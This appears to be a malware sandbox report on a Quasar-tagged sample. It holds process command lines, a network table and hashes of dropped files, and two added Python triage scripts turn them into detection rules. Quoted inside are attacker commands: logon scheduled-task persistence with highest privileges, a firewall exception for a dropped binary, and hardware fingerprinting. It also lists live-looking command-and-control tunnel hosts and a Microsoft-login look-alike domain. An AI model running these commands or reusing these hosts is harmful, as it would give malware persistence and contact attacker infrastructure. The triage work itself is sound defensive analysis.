"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pjCRu77GHrjM.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\xcopy.exe

xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop

C:\Windows\SysWOW64\regedit.exe

regedit

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0Wc443H7jsH8.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"
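
The command lines above contain the handful of events an analyst would pull out of this process dump: the "Windows 10 Boot" task created with /sc ONLOGON and /rl HIGHEST pointing at C:\Program Files\SubDir\Romilyaa.exe, the netsh firewall exception for !FIXInj.exe, the wmic csproduct get uuid hardware fingerprint, the forced kill of ctfmon.exe, and the repeated cmd /c <12 random chars>.bat immediately followed by chcp 65001 and ping -n 10 localhost, which is the delay-then-restart script shape used by Quasar (the family this page tags). The script below is an added example written for this page, not Tria.ge output and not code from any of the families named here; it runs a small set of rules over (image, command line) pairs copied from the listing above and correlates the .bat with the two events that follow it. The rule set, the technique labels and the field names are the editor's assumptions.

```python
"""Triage rules for sandbox process/command-line listings.

Added example (editor's code, not Tria.ge output): the rules, their MITRE
technique labels and the sample rows are assumptions; the rows are copied
from the Command Line section of this report."""
import re
from typing import List, Optional, Tuple

# Constructed input: (image, command line) pairs in the order the report lists them.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /f /im ctfmon.exe"),
    (r"C:\Windows\SYSTEM32\schtasks.exe",
     r'"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f'),
    (r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HncuP1qJTS5v.bat" "'),
    (r"C:\Windows\system32\chcp.com", "chcp 65001"),
    (r"C:\Windows\system32\PING.EXE", "ping -n 10 localhost"),
    (r"C:\Windows\System32\Wbem\wmic.exe", '"wmic.exe" csproduct get uuid'),
    (r"C:\Windows\SysWOW64\netsh.exe",
     r'netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE'),
    (r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/'),
]

WINDOWS_DIR = "c:\\windows\\"


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def _arg(flag: str, cmd: str) -> Optional[str]:
    """Value following `flag`, quoted or bare (e.g. /sc ONLOGON, /tr "C:\\...")."""
    m = re.search(rf'(?i){flag}\s+(?:"([^"]*)"|(\S+))', cmd)
    return (m.group(1) or m.group(2)) if m else None


def triage(events) -> List[dict]:
    events = list(events)
    findings: List[dict] = []
    for i, (image, cmd) in enumerate(events):
        name, low = _basename(image), cmd.lower()

        # Scheduled task that fires at logon/boot with highest privileges: T1053.005.
        if name == "schtasks.exe" and "/create" in low:
            trigger = (_arg("/sc", cmd) or "?").lower()
            target = _arg("/tr", cmd) or "?"
            elevated = re.search(r"(?i)/rl\s+highest", cmd) is not None
            if trigger in ("onlogon", "onstart") or elevated:
                findings.append({"index": i, "technique": "T1053.005",
                                 "detail": f"task '{_arg('/tn', cmd)}' ({trigger}, highest={elevated}) -> {target}",
                                 "outside_windows": not target.lower().startswith(WINDOWS_DIR)})

        # Firewall exception for a dropped binary (legacy `netsh firewall` or advfirewall): T1562.004.
        elif name == "netsh.exe" and re.search(r"(?i)\b(allowedprogram|add\s+rule)\b", cmd):
            m = re.search(r'(?i)(?:allowedprogram\s+|program=)(?:"([^"]*)"|(\S+))', cmd)
            prog = (m.group(1) or m.group(2)) if m else "?"
            findings.append({"index": i, "technique": "T1562.004", "detail": f"firewall allow for {prog}"})

        # Forced kill of another process (no single ATT&CK ID fits; labelled generically).
        elif name == "taskkill.exe" and (m := re.search(r"(?i)/f\b.*/im\s+(\S+)", cmd)):
            findings.append({"index": i, "technique": "process-kill", "detail": f"taskkill /f {m.group(1)}"})

        # Hardware UUID collection, a common stealer host-fingerprint step: T1082.
        elif name == "wmic.exe" and "csproduct" in low and "uuid" in low:
            findings.append({"index": i, "technique": "T1082", "detail": "wmic csproduct get uuid"})

        # cmd /c on a 12-character random .bat in %TEMP%, followed within the next
        # three events by `chcp 65001` and `ping -n N localhost`: the delay-then-
        # restart/delete script pattern used by Quasar's helper batch files.
        elif name == "cmd.exe" and re.search(r"(?i)\\temp\\[a-z0-9]{12}\.bat", cmd):
            following = " | ".join(c.lower() for _, c in events[i + 1:i + 4])
            if "chcp 65001" in following and re.search(r"ping\s+-n\s+\d+\s+localhost", following):
                findings.append({"index": i, "technique": "T1059.003",
                                 "detail": "Temp .bat + chcp 65001 + ping delay (Quasar-style restart script)"})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['index']:>2}] {f['technique']:<10} {f['detail']}")
```

The Edge launch is deliberately left unflagged: browser noise dominates dumps like this one, so every rule keys on the image name first and only then inspects arguments. The .bat rule is order-dependent on purpose; a `ping -n 10 localhost` on its own is harmless, and it is the combination with a freshly written batch in %TEMP% that makes it worth reporting.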

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 https-login--microsoftonline--com.httpsproxy.net udp
GB 142.250.200.19:80 https-login--microsoftonline--com.httpsproxy.net tcp
GB 142.250.200.19:80 https-login--microsoftonline--com.httpsproxy.net tcp
US 8.8.8.8:53 19.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 aadcdn.msauth.net udp
US 8.8.8.8:53 aadcdn.msftauth.net udp
US 13.107.253.65:443 aadcdn.msauth.net tcp
US 8.8.8.8:53 65.253.107.13.in-addr.arpa udp
US 13.107.253.65:443 aadcdn.msauth.net tcp
US 13.107.253.65:443 aadcdn.msauth.net tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 13.107.253.65:443 aadcdn.msauth.net tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 privacy.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 mrbeast.codes udp
US 8.8.8.8:53 dwrapper-prod.herokuapp.com udp
IE 46.137.15.86:80 dwrapper-prod.herokuapp.com tcp
US 8.8.8.8:53 86.15.137.46.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 trustsentry.com udp
US 8.8.8.8:53 ya.ru udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tria.ge udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 172.67.19.24:443 pastebin.com tcp
US 104.21.79.77:443 yip.su tcp
US 8.8.8.8:53 77.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 216.58.204.67:443 gstatic.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 www.youtube.com udp
US 104.18.40.144:443 tria.ge tcp
GB 216.58.212.238:443 www.youtube.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
GB 216.58.212.238:443 www.youtube.com udp
GB 142.250.179.246:443 i.ytimg.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.200.34:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 144.40.18.104.in-addr.arpa udp
US 8.8.8.8:53 238.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 246.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 34.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 static.doubleclick.net udp
GB 142.250.200.34:443 googleads.g.doubleclick.net udp
GB 216.58.201.106:443 jnn-pa.googleapis.com tcp
GB 142.250.179.230:443 static.doubleclick.net tcp
GB 216.58.201.106:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 230.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
US 172.67.188.178:443 iplogger.com tcp
US 8.8.8.8:53 having-jackson.gl.at.ply.gg udp
US 147.185.221.18:56522 having-jackson.gl.at.ply.gg tcp
US 8.8.8.8:53 178.188.67.172.in-addr.arpa udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 www.facebook.com udp
GB 216.58.212.238:443 www.youtube.com tcp
GB 163.70.151.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 173.194.69.84:443 accounts.google.com tcp
US 147.185.221.18:56522 having-jackson.gl.at.ply.gg tcp
US 8.8.8.8:53 consent.youtube.com udp
GB 142.250.187.238:443 consent.youtube.com tcp
NL 173.194.69.84:443 accounts.google.com udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 84.69.194.173.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
GB 163.70.151.35:443 www.facebook.com udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
GB 172.217.16.238:443 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
GB 172.217.16.238:443 play.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 163.70.151.21:443 static.xx.fbcdn.net udp
GB 142.250.179.228:443 www.google.com tcp
GB 172.217.16.238:443 play.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 228.179.250.142.in-addr.arpa udp
GB 142.250.179.228:443 www.google.com udp
US 8.8.8.8:53 video-lhr6-2.xx.fbcdn.net udp
US 8.8.8.8:53 video-lhr6-1.xx.fbcdn.net udp
GB 163.70.151.12:443 video-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.12:443 video-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.12:443 video-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.12:443 video-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.12:443 video-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.12:443 video-lhr6-2.xx.fbcdn.net tcp
US 8.8.8.8:53 video-lhr8-1.xx.fbcdn.net udp
US 8.8.8.8:53 video-lhr8-2.xx.fbcdn.net udp
GB 163.70.151.21:443 static.xx.fbcdn.net udp
GB 163.70.147.2:443 video-lhr6-1.xx.fbcdn.net tcp
GB 163.70.147.2:443 video-lhr6-1.xx.fbcdn.net tcp
GB 163.70.147.2:443 video-lhr6-1.xx.fbcdn.net tcp
GB 163.70.147.2:443 video-lhr6-1.xx.fbcdn.net tcp
GB 163.70.147.2:443 video-lhr6-1.xx.fbcdn.net tcp
GB 163.70.147.2:443 video-lhr6-1.xx.fbcdn.net tcp
GB 157.240.214.18:443 video-lhr8-2.xx.fbcdn.net tcp
GB 157.240.214.18:443 video-lhr8-2.xx.fbcdn.net tcp
GB 157.240.214.18:443 video-lhr8-2.xx.fbcdn.net tcp
GB 157.240.221.10:443 video-lhr8-1.xx.fbcdn.net tcp
GB 157.240.221.10:443 video-lhr8-1.xx.fbcdn.net tcp
GB 157.240.221.10:443 video-lhr8-1.xx.fbcdn.net tcp
US 8.8.8.8:53 scontent-lhr6-2.xx.fbcdn.net udp
GB 163.70.151.21:443 scontent-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.21:443 scontent-lhr6-2.xx.fbcdn.net tcp
GB 163.70.151.21:443 scontent-lhr6-2.xx.fbcdn.net tcp
US 8.8.8.8:53 scontent-lhr6-1.xx.fbcdn.net udp
GB 163.70.147.23:443 scontent-lhr6-1.xx.fbcdn.net tcp
US 8.8.8.8:53 12.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 2.147.70.163.in-addr.arpa udp
US 8.8.8.8:53 18.214.240.157.in-addr.arpa udp
US 8.8.8.8:53 10.221.240.157.in-addr.arpa udp
US 8.8.8.8:53 23.147.70.163.in-addr.arpa udp
US 8.8.8.8:53 scontent-lhr8-2.xx.fbcdn.net udp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
GB 157.240.214.11:443 scontent-lhr8-2.xx.fbcdn.net tcp
US 8.8.8.8:53 11.214.240.157.in-addr.arpa udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 9.73.50.20.in-addr.arpa udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 147.185.221.18:56522 having-jackson.gl.at.ply.gg tcp
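
Most rows in the table above are sandbox background (reverse-DNS lookups of every IP contacted, mDNS, Edge fetching YouTube, Facebook and Google assets). The indicators are buried among them: repeated resolution of jozzu420-51305.portmap.host, three TCP connections to having-jackson.gl.at.ply.gg on 147.185.221.18:56522 (a tunnel broker hostname on a high port, the usual shape of a RAT callback), lookups of ip-api.com and iplogger.com, fetches from pastebin.com and dwrapper-prod.herokuapp.com (matching the "Legitimate hosting services abused" and "Looks up external IP address" signatures), and a hostname built to resemble login.microsoftonline.com under httpsproxy.net. The script below is an added example for this page, not sandbox output; it parses rows in the report's own four-column format, discards the noise classes, and groups what remains by domain with the reasons it was kept. The suffix lists and the brand-look-alike heuristic are the editor's assumptions.

```python
"""Triage of a sandbox network table (Country, Destination, Domain, Proto).

Added example (editor's code, not Tria.ge output). The category lists are
assumptions chosen for this report; the sample rows are copied from it."""
from ipaddress import ip_address
from typing import Dict, List, Set, Tuple

# Constructed input: rows copied from the Network section above; the Domain
# column is empty on the mDNS row, exactly as in the report.
SAMPLE_ROWS = """\
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 https-login--microsoftonline--com.httpsproxy.net udp
GB 142.250.200.19:80 https-login--microsoftonline--com.httpsproxy.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 dwrapper-prod.herokuapp.com udp
IE 46.137.15.86:80 dwrapper-prod.herokuapp.com tcp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 172.67.188.178:443 iplogger.com tcp
US 147.185.221.18:56522 having-jackson.gl.at.ply.gg tcp
GB 216.58.212.238:443 www.youtube.com tcp
"""

TUNNEL_SUFFIXES = ("portmap.host", "ply.gg")                 # port-forwarding / tunnel brokers
IP_LOOKUP = ("ip-api.com", "iplogger.com")                   # external-IP and visitor-logging services
ABUSED_HOSTING = ("pastebin.com", "herokuapp.com", "github.com", "raw.githubusercontent.com")
BRANDS = {"microsoftonline": "microsoftonline.com", "microsoft": "microsoft.com",
          "google": "google.com", "facebook": "facebook.com", "youtube": "youtube.com"}
COMMON_PORTS = {53, 80, 443}


def _under(host: str, apex: str) -> bool:
    return host == apex or host.endswith("." + apex)


def parse_rows(text: str) -> List[Tuple[str, str, int, str, str]]:
    """Split the report's whitespace-separated rows; a 3-token row has no domain."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            (country, dest, proto), domain = parts, ""
        else:
            continue
        ip, sep, port = dest.rpartition(":")
        if not sep:
            continue
        rows.append((country, ip, int(port), domain.lower(), proto.lower()))
    return rows


def classify_domain(host: str) -> Set[str]:
    reasons: Set[str] = set()
    if any(_under(host, s) for s in TUNNEL_SUFFIXES):
        reasons.add("tunnel service")
    if any(_under(host, s) for s in IP_LOOKUP):
        reasons.add("external IP lookup")
    if any(_under(host, s) for s in ABUSED_HOSTING):
        reasons.add("abusable hosting")
    # Brand token present but the name is not under the brand's real apex domain.
    for token, apex in BRANDS.items():
        if token in host and not _under(host, apex):
            reasons.add("brand look-alike")
            break
    return reasons


def triage_network(text: str) -> Dict[str, Dict[str, List[str]]]:
    out: Dict[str, Dict[str, set]] = {}
    for _country, ip, port, domain, proto in parse_rows(text):
        # Reverse-DNS lookups and multicast (mDNS) are sandbox background noise.
        if domain.endswith(".in-addr.arpa") or ip_address(ip).is_multicast:
            continue
        reasons = classify_domain(domain) if domain else set()
        is_dns = port == 53 and proto == "udp"
        if not is_dns and port not in COMMON_PORTS:
            reasons.add(f"non-standard port {port}/{proto}")
        if not reasons:
            continue
        entry = out.setdefault(domain or ip, {"reasons": set(), "endpoints": set()})
        entry["reasons"] |= reasons
        if not is_dns:                      # keep the resolved IP:port for blocking
            entry["endpoints"].add(f"{ip}:{port}")
    return {k: {"reasons": sorted(v["reasons"]), "endpoints": sorted(v["endpoints"])}
            for k, v in out.items()}


if __name__ == "__main__":
    for host, info in triage_network(SAMPLE_ROWS).items():
        print(f"{host:<55} {', '.join(info['reasons'])}  {info['endpoints']}")
```

DNS-only entries (portmap.host here) come out with an empty endpoint list, which is itself useful: the sandbox resolved the name repeatedly but never connected, so the tunnel was probably down during detonation and the hostname, not an IP, is the durable indicator. The brand heuristic is crude by design and will also flag CDN names such as googleads.g.doubleclick.net; in a real pipeline pair it with an allowlist of the brand's own CDN domains.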

Files

memory/1656-0-0x00000000747DE000-0x00000000747DF000-memory.dmp

memory/1656-1-0x0000000000EA0000-0x0000000000EFE000-memory.dmp

memory/1656-2-0x0000000005730000-0x0000000005754000-memory.dmp

memory/1656-3-0x00000000747D0000-0x0000000074F80000-memory.dmp

memory/1656-4-0x0000000005DD0000-0x0000000006374000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\!main.cmd

MD5 5bef4958caf537ac924b6ce01e1d1e13
SHA1 cf7a0805a98f3c16ca14c6e420e2ca44ad77a164
SHA256 e801541a9d48a9adbb720cdb5b06f9bab9b4a62f0434221876a607a7be75d28d
SHA512 9f62246e56f3461f8d180d3a4bc3ccd6187f457196b770af9c8427a3795504f6b44d2fb7a305d41d54d58e4759136426ca4f6e09771136f27d2c478aad153f99

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.pack

MD5 34a66c4ec94dbdc4f84b4e6768aebf4e
SHA1 d6f58b372433ad5e49a20c85466f9fb3627abff2
SHA256 fcf530e33a354ac1de143e2f87960e85f694e99d7aa652408c146e8d0a1430fb
SHA512 4db51769dcee999baf3048c793dde9ad86c76f09fc17edd8e2f1dedf91cf224ddfbe9554c4ff14659ea0f6663b054953ec2ab9d964e6e9ca44ee744e02b7e5b9

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\doxx.cmd

MD5 013a01835332a3433255e3f2dd8d37d6
SHA1 8a318cc4966eee5ebcb2c121eb4453161708f96c
SHA256 23923556f7794769015fb938687bf21c28ae5f562c4550c41d3d568ad608b99b
SHA512 12e9d439c8c558218d49415bbd27d0749f9f7a7e6c177074e11ac1a6f2185c22c4cf51f5a41133eaddf8a06288c352460d4450ad9702c4652ad259ed1260f42d

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\spread.cmd

MD5 7a71a7e1d8c6edf926a0437e49ae4319
SHA1 d9b7a4f0ed4c52c9fbe8e3970140b47f4be0b5f1
SHA256 e0d127c00f9679fb359c04b6238b976f1541918a0df0d6c61f1a44e8f27846ae
SHA512 96a57412bda3f16e56398cd146ece11e3d42291dceff2aec22871a7e35e3b102b27151984ae0795ca6d5ef5385ef780906d9b13cec78cbbdf019a3de4792ca3a

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.didata

MD5 41b8ce23dd243d14beebc71771885c89
SHA1 051c6d0acda9716869fbc453e27230d2b36d9e8f
SHA256 bc86365a38e3c8472413f1656a28b04703d8c77cc50c0187ddf9d0afbb1f9bf7
SHA512 f0fb505c9f8d2699717641c3571acb83d394b0f8eee9cff80ad95060d1993f9f4d269c58eb35aae64a639054e42aaa699719b08357f7c0c057b407e2bdf775da

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.edata

MD5 37c1a5c63717831863e018c0f51dabb7
SHA1 8aab4ebcf9c4a3faf3fc872d96709460d6bf6378
SHA256 d975b12871fc3f217b71bb314e5e9ea6340b66ece9e26a0c9cbd46de22368941
SHA512 4cf2b8efa3c4520cc80c4d560662bddbe4071b6908d29550d59bcda94c8b80a282b5e0b4536a88331a6a507e8410ccb35f4e38d0b571960f822bda7b69e4bb19

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.idata

MD5 a73d686f1e8b9bb06ec767721135e397
SHA1 42030ea2f06f38d5495913b418e993992e512417
SHA256 a0936d30641746144eae91e37e8cbed42dc9b3ee3e5fdda8e45ad356180f0461
SHA512 58942400f6b909e42d36187fd19d64a56b92c2343ed06f6906291195fea6fe5a79fc628cbfc7c64e09f0196cbaba83dc376985ceef305bd0a2fadaca14b5c9e5

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\.txt

MD5 8f2f090acd9622c88a6a852e72f94e96
SHA1 735078338d2c5f1b3f162ce296611076a9ddcf02
SHA256 61da25d2beb88b55ef629fab530d506a37b56cfabfa95916c6c5091595d936e4
SHA512 b98fbb6d503267532d85bf0eb466e4e25169baefafdaaa97bdc44eaab2487419fde106626c0cc935ba59bcb4472597e23b3c21e3347ed32de53c185739735404

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\0.txt

MD5 c1672053cdc6d8bf43ee7ac76b4c5eee
SHA1 fc1031c30cc72a12c011298db8dc9d03e1d6f75c
SHA256 1cdb267b3e66becf183e9e747ae904e8684bab519041f39f9bd0b7dd0b3c66cb
SHA512 12e64a77c5b07d1f0fe1f07a6bf01078373d99bb7372a2d8a5c44fdbf753b44381f112822c1f75475e762d85fcf806487925860941005d342473ec90f9997633

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\CERTIFICATE.cer

MD5 c07164d3b38ca643290adaa325e1d842
SHA1 895841abf68668214e5c8aa0a1600ff6b88e299d
SHA256 da5dd4622c1c9054dc2c01cb36d26802ffbd3345e8cf8a20a2e8d7a859251600
SHA512 92922192fdca0b6a0a6634415fd0ccdd32087584b7b2ea0a1e550b8bf9a5c8fe79401fadc0de8d4d340ef700a01079b51529adcab576f0ca17a864748ae39118

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\data.txt

MD5 4c195d5591f6d61265df08a3733de3a2
SHA1 38d782fd98f596f5bf4963b930f946cf7fc96162
SHA256 94346a0e38b0c2ccd03cf9429d1c1bce2562c29110bb29a9b0befc6923618146
SHA512 10ee2e62ca1efa1cda51ca380a36dfabdd2e72cec41299369cac95fc3864ca5f4faa959f70d2b2c145430e591b1249f233b31bd78ba9ee64cf0604c887b674d7

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\_.txt

MD5 ad6e46e3a3acdb533eb6a077f6d065af
SHA1 595ad8ee618b5410e614c2425157fa1a449ec611
SHA256 b68ad9b352910f95e5496032eea7e00678c3b2f6b0923eb88a6975ef52daf459
SHA512 65d1f189e905419cc0569fd7f238af4f8ba726a4ddad156345892879627d2297b2a29213ac8440756efb1d7aaead1c0858462c4d039b0327af16cbb95840a1e8

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\1\i.txt

MD5 d40fc822339d01f2abcc5493ac101c94
SHA1 83d77b6dc9d041cc5db064da4cae1e287a80b9e6
SHA256 b28af33bc028474586bb62da7d4991ddd6f898df7719edb7b2dfce3d0ea1d8c6
SHA512 5701c2a68f989e56e7a38e13910421c8605bc7b58ae9b87c1d15375829e100bad4ac86186f9d5670c9a5e0dd3e46f097d1d276e62d878e0c2f6eb5f6db77dd46

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\export\2\CODE2000.TTF

MD5 052eaff1c80993c8f7dca4ff94bb83ca
SHA1 62a148210e0103b860b7c3257a18500dff86cb83
SHA256 afabc4e845085d6b4f72a9de672d752c002273b52221a10caf90d8cb03334f3c
SHA512 57209c40b55170da437ab1120b2f486d698084d7d572b14889b2184e8327010a94eee25a86c9e0156ba12ed1a680507016390f059f265cceb3aa8698e8e94764

